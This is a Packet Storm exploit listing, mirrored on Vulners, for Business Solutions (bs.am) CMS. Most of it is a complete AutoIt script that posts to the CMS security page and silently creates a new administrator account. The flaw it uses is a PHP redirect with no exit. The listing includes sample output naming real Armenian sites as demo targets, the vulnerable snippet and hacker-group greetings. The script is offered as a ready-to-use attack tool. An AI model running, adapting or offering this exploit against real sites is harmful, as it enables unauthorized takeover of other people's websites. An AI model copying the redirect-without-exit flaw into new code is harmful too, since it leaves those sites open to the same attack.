Lucene search
K

Business Solutions CMS Add Admin

🗓️ 10 Jan 2013 00:00:00Reported by AkastepType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 57 Views

Add Admin to Business Solutions CMS via Remote Exploi

Code
`#cs  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm AkaStep member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
bs_am_remote_add_admin.au3  
  
  
BS.AM (BUSINESS SOLUTIONS) CMS REMOTE ADD ADMIN EXPLOIT.  
THIS IS A EXPLOIT WRITTEN IN AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.  
ON SUCCESSFULL REMOTE EXPLOITATION IT WILL NEW ADMIN TO TARGET SITE.  
  
***** THIS IS A WHOLE EXPLOIT! *****  
THANK YOU!  
  
FEW DEMOS:  
  
http://asba.am  
http://doors.am  
  
  
  
DEMO USAGE:  
  
>poc.exe http://asba.am bigbang bigbang  
  
  
##############################################################  
(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8)  
Usage: poc.exe http://site.tld username password  
[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]  
[@@@] Vuln & Exploit By AkaStep [@@@]  
##############################################################  
[+] GETTING INFO ABOUT CMS [+]  
[*] GOT Response : Yes! It is exactly that we are looking for! [*]  
  
##################################################  
Trying to add new admin:  
To Site:www.asba.am  
With Username: bigbang  
With Password: bigbang  
##################################################  
  
##################################################  
Exploit Try Count:1  
##################################################  
Error Count: 0  
##################################################  
  
##################################################  
Exploit Try Count:2  
##################################################  
Error Count: 0  
##################################################  
Count of errors during exploitation : 0  
  
##################################################  
[*] Seems we are going to travel xD. [*]  
Try to login @  
Site: asba.am/cms/index.php  
With Username: bigbang  
With Password: bigbang  
##################################################  
[*] Exit [*]  
##################################################  
  
  
  
  
  
  
  
  
VULNERABLE CODE:  
NOTICE script continues it's execution.Because missing exit; after header();  
FUNNY TO SEE HOW MANY PROGRAMMERS FAILS TO UNDERSTAND THIS;)  
  
//cms/admin.php  
  
============SNIP BEGINS============  
<?  
session_start();  
if ($_SESSION['login11_error'] != "no")  
header("Location: index.php");  
include 'config.php';?>  
<!DOCTYPE html  
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"  
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
<html>  
<head>  
<title>cms::</title>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">  
<link rel="stylesheet" type="text/css" href="css/main.css" />  
<script type="text/javascript" src="javascript/jquery-1.4.2.js"></script>  
  
<script type="text/javascript" src="javascript/admin.js"></script>  
<script type="text/javascript" src="javascript/jquery-ui-1.8.11.custom.min.js"></script>  
<script type="text/javascript" src="javascript/jquery.ui.datepicker-hy.js"></script>  
  
<script type="text/javascript" src="javascript/jquery.lightbox-0.5.js"></script>  
<link type="text/css" href="css/jquery-ui-1.8.11.custom.css" rel="stylesheet" />  
</head>  
<body>  
<div id="header">  
  
============SNIP ENDS HERE===========  
  
  
  
#ce  
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****  
#AutoIt3Wrapper_UseUpx=n  
#AutoIt3Wrapper_Change2CUI=y  
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****  
#NoTrayIcon  
#include "WinHttp.au3"  
#include <inet.au3>  
#include <String.au3>  
  
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _  
'(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _  
'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _  
@CRLF & "[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _  
'[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);  
ConsoleWrite(@CRLF & $exploitname & @CRLF)  
  
$method='POST';  
$vulnurl='cms/admin.php?lang=en&page=security';  
Global $count=0,$error=0;  
$cmsindent='CaptchaSecurityImages.php';  
$adminpanel='/cms/index.php';  
  
if $CmdLine[0] <> 3 Then  
MsgBox(64,"","Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://www.site.tld ' & ' username ' & 'password' & @CRLF);  
exit;  
EndIf  
  
  
if $CmdLine[0]=3 Then  
$targetsite=$CmdLine[1];  
$username=$CmdLine[2];  
$password=$CmdLine[3];  
EndIf  
  
  
  
if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then  
ConsoleWrite('Are you kidding me?');  
Exit;  
EndIf  
  
  
  
$doublecheck=InetGet($targetsite,'',1);  
if @error Then  
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)  
Exit;  
EndIf  
  
  
ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);  
sleep(Random(1200,2500,1));  
  
  
  
  
$sidentify=_INetGetSource($targetsite & $adminpanel,True);  
  
  
  
  
if StringInStr($sidentify,$cmsindent) Then  
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)  
Else  
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)  
$error+=1;  
EndIf  
  
  
  
  
$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')  
  
  
priv8($targetsite,$username,$password,$count,$error);#~ do magic for me plizzz));~#  
  
Func priv8($targetsite,$username,$password,$count,$error)  
  
  
$count+=1;  
  
  
Global $sAddress = $targetsite  
  
$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;  
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _  
$username & @CRLF & 'With Password: ' & $password & $triptrop;  
if $count <=1 then ConsoleWrite($whatcurrentlywedo)  
  
$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count: ' & $error & $triptrop;  
ConsoleWrite($doitnicely);  
Global $sPostData = "username=" & $username & "&password=" & $password & "&rewrite_password=" & $password & "&ifsubmit=yes";  
  
  
if $error>=2 OR $count>=2 Then  
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)  
  
if int($error)=0 then  
ConsoleWrite($triptrop & '[*] Seems we are going to travel xD. [*]' & _  
@CRLF & 'Try to login @ ' & @CRLF & _  
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _  
$username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);  
exit;  
Else  
  
ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _  
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _  
'[*] May be you are Lucky;) [*]' & _  
@CRLF & 'Try to login @ ' & @CRLF & _  
'Site: ' & $targetsite & $adminpanel & @CRLF & _  
'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);  
  
EndIf  
exit;  
  
EndIf  
  
  
  
Global $hOpen = _WinHttpOpen("Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325)");  
  
  
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)  
  
  
Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');  
  
  
  
  
  
  
  
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")  
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")  
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")  
_WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300")  
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")  
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")  
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));  
  
  
  
  
  
  
_WinHttpSendRequest($hRequest, -1, $sPostData)  
  
_WinHttpReceiveResponse($hRequest)  
  
Global $sHeader, $sReturned  
If _WinHttpQueryDataAvailable($hRequest) Then  
$sHeader = _WinHttpQueryHeaders($hRequest)  
Do  
$sReturned &= _WinHttpReadData($hRequest)  
Until @error  
  
_WinHttpCloseHandle($hRequest)  
_WinHttpCloseHandle($hConnect)  
_WinHttpCloseHandle($hOpen)  
  
$targetsite=StringMid($targetsite,5,StringLen($targetsite))  
Sleep(1500);  
priv8($targetsite,$username,$password,$count,$error);  
  
Else  
$error+=1  
  
_WinHttpCloseHandle($hRequest)  
_WinHttpCloseHandle($hConnect)  
_WinHttpCloseHandle($hOpen)  
  
$targetsite=StringMid($targetsite,5,StringLen($targetsite))  
Sleep(1500);  
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#  
  
EndIf  
  
EndFunc;=> priv8();  
  
  
#cs  
  
================================================  
KUDOSSSSSSS  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers  
  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  
  
#ce  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jan 2013 00:00Current
0.2Low risk
Vulners AI Score0.2
57